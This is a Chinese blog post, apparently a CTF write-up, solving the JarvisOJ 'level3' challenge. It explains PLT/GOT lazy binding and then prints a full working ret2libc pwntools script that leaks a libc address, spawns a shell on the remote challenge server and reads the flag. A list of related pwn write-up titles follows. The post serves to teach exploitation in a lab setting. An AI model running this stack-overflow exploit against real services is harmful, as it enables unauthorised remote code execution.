jarvisoj level3

原創 长着翅膀的乌龟 2020-06-19 08:24

level3

將文件下載下來使用linux下的checksec進行檢查開啓了什麼安全機制

sun@ubuntu:~/Desktop/test$ checksec level3 
[*] '/home/sun/Desktop/test/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

開啓可棧中不能執行
將這個文件放入ida裏面可以看出這個文件裏面並沒有system函數和/bin/sh字符串,因此不能直接得出system函數的地址,我們可以知道還給了一個libc庫,可以在這個庫中尋找需要的函數和字符串。
在這裏插入圖片描述在這裏插入圖片描述可以很容易發現有溢出的漏洞,要想得到shell必須要執行system("/bin/sh")這樣的命令,因此這需要我們去構造。
在構造之前需要知道一個知識:在庫中兩個函數的偏移之差等於程序實際運行中這兩個函數在程序中的偏移之差。

首先因爲我們有這個共享庫,因此既我們能夠很容易得到在libc庫中函數的偏移量,使用ELF便能得到

因此只要能夠得到一個在程序運行中的函數地址便可以算出庫函數中任意函數在程序中的地址了。

接下來的問題便是得到一個函數的地址,在這之前需要知道在linux程序運行中有兩個表got表和plt表,這是當運行一個函數時需要使用到這兩個表,當第一次運行一個共享庫中的函數時,便會找到對應的plt表中的內容,這個內容是got表的地址,got表裏面的內容是plt表中的第二條指令,然後會在共享庫中尋找對應函數的地址,並將地址放入got表中,這便是延遲綁定,表示當運行時纔會確定一個共享庫函數的真實地址,當第二次使用這個函數時會直接使用got表中的內容當成函數的地址,這是因爲在第一次已經找到了,以後就可以直接使用了。

我們使用elf.symbols[‘write’]和elf.plt[‘write’]這個得到的結果是相同的,都是對應函數在plt表的地址(並不是plt表中的內容),當使用elf.plt[‘func’]會報錯這是因爲用戶自定義的函數不在這個表裏,elf.got[‘write’]這個返回對應函數got表的地址。

調用共享庫的函數都是調用的這個函數plt表的地址,然後會找到真正的函數地址。

下面便是這個題的答案

elf=ELF("./libc-2.19.so")
elf1=ELF("./level3")
p=remote("pwn2.jarvisoj.com",9879)
sys_addr_lib=elf.symbols['system']
bin_addr_lib=elf.search('/bin/sh').next()
wri_addr_lib=elf.symbols['write']
write_plt=elf1.symbols['write']
write_got=elf1.got['write']
read_plt=elf1.symbols['read']
func_addr=elf1.symbols['vulnerable_function']
payload1='a'*0x88+'AAAA'+p32(write_plt)+p32(func_addr)+p32(1)+p32(write_got)+p32(4)
p.recvuntil("Input:\n")
p.sendline(payload1)
write_addr=u32(p.recv(4))
print type(write_addr)


sys_addr=write_addr-wri_addr_lib+sys_addr_lib
bin_addr=write_addr-wri_addr_lib+bin_addr_lib
p.recvuntil("Input:\n")
payload2='a'*0x88+'AAAA'+p32(sys_addr)+p32(2)+p32(bin_addr)
p.sendline(payload2)
p.interactive()


sun@ubuntu:~/Desktop/test$ python 3.py 
[*] '/home/sun/Desktop/test/libc-2.19.so'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/sun/Desktop/test/level3'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to pwn2.jarvisoj.com on port 9879: Done
<type 'int'>
[*] Switching to interactive mode
$ ls
flag
level3
$ cat flag
CTF{d85346df5770f56f69025bc3f5f1d3d0}
$
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn練習0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

HITCON-Training lab5(自己構造rop)

看到靜態鏈接,一頓欣喜,直接ropchain生成,棧溢出找出來就ok啦?然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab7(一道簡單的格式化字符串讀漏洞)

格式化字符串知道他的操作,可是做的一點也不熟練吧,,,BJDCTF上的r2t4不會啊,,,看不懂,,,所以就來補補格式化字符串的題目了,,,,   看到canary開啓了,我還以爲要泄漏canary呢,結果發現不用那麼麻煩,,, 其實

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab8(格式化字符串寫漏洞)

還在補格式化字符串漏洞的知識,,,,看到這道題的時候,有點懵,,,因爲發現218不會整,,,看官方writeup也不太行,,,   先知社區上有篇講的就很好了,,,nice,用了四種方法(最後一種沒看懂,,,),,,看完,BJDCTF那道

言承Yolanda 2020-07-08 01:37:40

BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)

r2t3 最簡單的一道題,可是我竟然沒有做出來,無語了,,, 文件保護沒啥好說的,,,很正常 進入name_check函數 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 2

言承Yolanda 2020-07-08 01:37:40

棧遷移學習(buuctf [Black Watch 入羣題])

i春秋的borrowstack是棧遷移和萬能gadget的混合,,,然後writeup看的不是很明白,也沒有很細的解析,所以,emmm,應該是自己棧遷移學的不是很好,只是知道大概的意思,但是還沒有做過題,這次在看雪看到文章,就好好學一下,

言承Yolanda 2020-07-08 01:37:40

BUUCTF刷題(前12道)

哈哈哈,我又來刷題了,看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看,發現直接執行system,所以,直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda 2020-07-08 01:37:40

逆向入門筆記之分析TraceMe.exe

TraceMe.exe是一個示例程序,用於逆向的學習,簡單地模擬了註冊機制。 我們把它拖進IDA中無腦F5一波: 雙擊DialogFunc進入這個函數: BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow 2020-07-07 15:59:23

linux pwn練習0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56

iz_heap_lv1

iz_heap_lv1 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,delete功能裏存在數組下標越界,可以free掉第21個堆指針,而第21個位置對應name的空間 因此,我們可以在name裏僞造一個chunk,fr

haivk 2020-07-05 02:32:56

free_spirit(在棧上爆破一個可以被free的fake_chunk)

free_spirit(在棧上爆破一個可以被free的fake_chunk) 首先檢查一下程序的保護機制 然後,我們用IDA分析一下,功能3存在8字節溢出,將會把v7下面的buf指針覆蓋掉,而覆蓋了buf指針,就能實現任意地址寫。  

haivk 2020-07-05 02:32:56

DASCTF&BJDCTF 3rd 三道PWN題復現

最近看了一下上次安恆五月賽沒做出的幾道PWN題,感覺自己水平還是不夠,還要多學習 easybabystack(格式化字符串*, ret2csu) 這題有個棧溢出漏洞 但是必須輸入正確的密碼,否則就直接退出了 還有個格式化字符串

L.o.W 2020-07-04 09:32:10

Ubuntu_16.04 從0開始配置pwn環境

基礎軟件安裝 大佬@giantbranch 配置的虛擬機,如果覺得自己用搭建環境比較麻煩,可以在他的github中直接下載虛擬機(提取碼: kypa),個人感覺是非常適合新手入門時使用的一套工具,也可以從github上獲取腳本

阿鲁卡Alluka 2020-07-02 23:02:40